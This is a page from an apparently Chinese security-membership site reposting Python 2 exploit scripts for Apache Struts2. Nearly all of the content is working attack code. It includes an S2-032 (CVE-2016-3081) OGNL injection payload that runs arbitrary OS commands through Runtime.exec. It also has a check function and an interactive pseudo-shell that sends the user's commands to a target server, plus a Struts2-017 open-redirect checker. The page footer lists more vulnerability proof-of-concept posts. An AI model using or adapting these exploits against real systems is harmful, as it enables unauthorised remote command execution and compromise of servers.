S2032EXP.append("?method:%23_memberAccess[%23parameters.name1[0]]%3dtrue,%23_memberAccess[%23parameters.name[0]]%3dtrue,%23_memberAccess[%23parameters.name2[0]]%3d{},%23_memberAccess[%23parameters.name3[0]]%3d{},%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew%20java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&name=allowStaticMethodAccess&name1=allowPrivateAccess&name2=excludedPackageNamePatterns&name3=excludedClasses&cmd=GiveMeCommand&pp=\\\\AAAA&ppp=%20&encoding=UTF-8 ") # 用于鉴别EXP是否成功利用的错误关键字 Error_Message = [r']+>’, r’Error report’, r’Apache Tomcat’, r’memberAccess’, r’ServletActionContext’]

def VerityS2032(url, S2032POC):
try:
k = (len(url)+10)/2 + 10
poc_count = 1
print u”You have “+str(len(S2032POC))+” POCS”
for poc in S2032POC:
targetURL = url+poc
print ‘-‘*k+”trying poc “+str(poc_count)+’-‘*(k-2)
req = requests.get(targetURL, headers=headers, timeout=timeout)
resulttext = req.text.encode(“utf-8″).strip().strip(‘\x00’)
if hashKey in resulttext:
print ‘-‘*k+”Successful”+”-“*k
# print ‘–vulnerabilityS2-032 –‘
print ‘–‘+url+” is vulnerable [S2-032(CVE-2016-3081)]”
print ‘-‘*(len(url)+40)
return True
else:
poc_count = poc_count + 1
pass
print “This Target is not vulnerable”
return False
except Exception, e:
print “something error!!”
return False

def ExcuteOsCommand(url, yourcommand, S2032EXP):
try:
exp_k = (len(url)+10)/2 + 10
print u”You have “+str(len(S2032EXP))+” EXPS”
exp_count = 1
exp_over = False
for exp in S2032EXP:
exp_wrong = True
print ‘-‘*exp_k+”trying exp “+str(exp_count)+’-‘*(exp_k+7)
comm = exp.replace(“GiveMeCommand”, str(yourcommand))
# targetURL = url
targetURL = url+comm
req = requests.get(targetURL, headers=headers, timeout=timeout)
resulttext = req.text.encode(“utf-8”).strip()

comdresulttext = resulttext.strip(‘\x00’)
for p in Error_Message:
m = re.search(p, comdresulttext)
if m:
exp_wrong = True
break
else:
exp_wrong = False
continue
if exp_wrong:
exp_count = exp_count + 1
exp_over = False
continue
else:
print ‘-‘*exp_k+”Executed successfully”+’-‘*(exp_k-2)
print ‘-‘*14
print ‘Command# ‘+yourcommand
print ‘-‘*14
print “Result:”
print ‘-‘*exp_k
print comdresulttext
print ‘-‘ * exp_k
exp_over = True
break
if not exp_over:
print “All EXP failed…”
except Exception, e:
# print e
print “something error!!”

def CommandTool(url):
flag = VerityS2032(url, S2032POC)
if flag:
print “[+] Connecting to target …”
while True:
comm = raw_input(“~$ “)
if ‘q’ == comm:
print “exit….”
exit(0)
elif comm != “”:
ExcuteOsCommand(url, comm, S2032EXP)
else:
print “the website is not vulnerable”
if __name__ == “__main__”:
if len(sys.argv) == 3 and “http” in sys.argv[1]:
target_url = sys.argv[1]
order = sys.argv[2]
if “check” == order:
VerityS2032(target_url, S2032POC)
exit(0)
elif “cmdtool” == order:
CommandTool(target_url)
else:
ExcuteOsCommand(target_url, order, S2032EXP)
exit(0)
else:
print ‘-‘ * 90
print ‘#’ + notice + “#”
print ‘-‘ * 90

“`
# Struts2-017.py
“`
#coding=utf-8
import sys
import requests
def scan(target):
info = {
‘name’:u’Struts2-017 POC’,
‘date’:’2014-12-5′,
‘author’:’Lenka’,
‘poc’:’?redirect:http://vul.jdsec.com/’
}
headers = {
‘User-Agent’:’Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36′,
‘Accept’:’text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8′
}
audit_request = requests.get(target + info[‘poc’],headers=headers)
audit_request.close()
if audit_request.status_code == 200:
if audit_request.url == u’http://vul.jdsec.com/’:
print u'[!]audit success’
print ‘[*]’ + target + info[‘poc’]
else:
print u'[!]audit error’
else:
print ‘connection error’
if __name__ == ‘__main__’:
if len(sys.argv) < 2: print "Usage: python struts2_poc_017.py [target]\n" print "Example: python python struts2_poc_017.py http://www.xxx.com/xxx.action\n" sys.exit(1) else: target = sys.argv[1] scan(target) ```

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
国内漏洞库
喜欢就支持一下吧
点赞0 分享
棉花糖的头像-棉花糖会员站年费会员
会员必看手册(20241201版本)-棉花糖会员站
会员必看手册(20241201版本)
会员必看手册(20241201版本)
12月1日 2W+
独家!超强代码审计工具上线!免费会员等你来嫖!-棉花糖会员站
独家!超强代码审计工具上线!免费会员等你来嫖!
独家!超强代码审计工具上线!免费会员等你来嫖!
12月17日 4166
技术文章投稿兑换会员规则-棉花糖会员站
技术文章投稿兑换会员规则
技术文章投稿兑换会员规则
3月25日 3997
已开奖!国庆抽奖,猫咪赞助安全课程300份-棉花糖会员站
已开奖!国庆抽奖,猫咪赞助安全课程300份
已开奖!国庆抽奖,猫咪赞助安全课程300份
9月29日 3094
王老师src真正的完整版(49个学生分享视频版本)-棉花糖会员站
王老师src真正的完整版(49个学生分享视频版本)
王老师src真正的完整版(49个学生分享视频版本)
6月8日 2566
上心-SRC培训课-棉花糖会员站
上心-SRC培训课
上心-SRC培训课
5月7日 2502
相关推荐
海康威视漏洞合集-棉花糖会员站
海康威视漏洞合集
海康威视漏洞合集
6月1日 1138
易思智能物流无人值守系统 login SQL注入-棉花糖会员站
易思智能物流无人值守系统 login SQL注入
易思智能物流无人值守系统 login SQL注入
11月6日 792
湖南强智教务管理系统存在 任意文件下载-棉花糖会员站
湖南强智教务管理系统存在 任意文件下载
湖南强智教务管理系统存在 任意文件下载
10月21日 735
投稿:多个poc-棉花糖会员站
投稿:多个poc
投稿:多个poc
10月19日 668
郑州时空-TMS运输管理系统 GetDataBase 信息泄露-棉花糖会员站
郑州时空-TMS运输管理系统 GetDataBase 信息泄露
郑州时空-TMS运输管理系统 GetDataBase 信息泄露
1月5日 662
金蝶天燕ApusicServer servicefactoryservice 远程命令执行-棉花糖会员站
金蝶天燕ApusicServer servicefactoryservice 远程命令执行
金蝶天燕ApusicServer servicefactoryservice 远程命令执行
10月24日 654
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容

作者
用户封面
棉花糖的头像-棉花糖会员站年费会员
老外百万赏金猎人直播课录屏第七课
Zeroshell 远程命令执行(CVE-2020-29390)
【必看】年终抽奖礼物事宜细则(彩蛋版)
蓝凌EKP系统fsscCommonPortlet.do 未授权SQL注入
福建科立讯通信有限公司指挥调度send_fax.php 命令执行
杭州平治科技一卡通系统 AddPkFreePartyMFCar SQL注入
最近一周热门文章

1[投稿]某知识星球付费资源,价值120大洋

jiangtop666的头像-棉花糖会员站年费会员2月1日
年费会员会员专属925

2某公众号的纯垃圾SRC知识库(他妈的又被割了)

1inc50的头像-棉花糖会员站年费会员1月30日
年费会员会员专属784

3老外百万赏金猎人直播课录屏第七课

棉花糖的头像-棉花糖会员站年费会员2月3日
年费会员会员专属525
标签云
龙浏览器未引用的服务路径特权升级齿轮地理位置查询鼠标鼠标按钮命令注入远程鼠标远程代码执行鼠标远程代码鼠标路径遍历鼠标本地文件包含鼠标未引用的服务路径鼠标事件状态栏鼠标默认错误页面跨站点脚本默认配置远程代码执行默认管理员凭据默认的调制解调器上的密码硬件远程默认权限默认权利默认弱密码编码默认密码默认安全性硬件远程默认和弱加密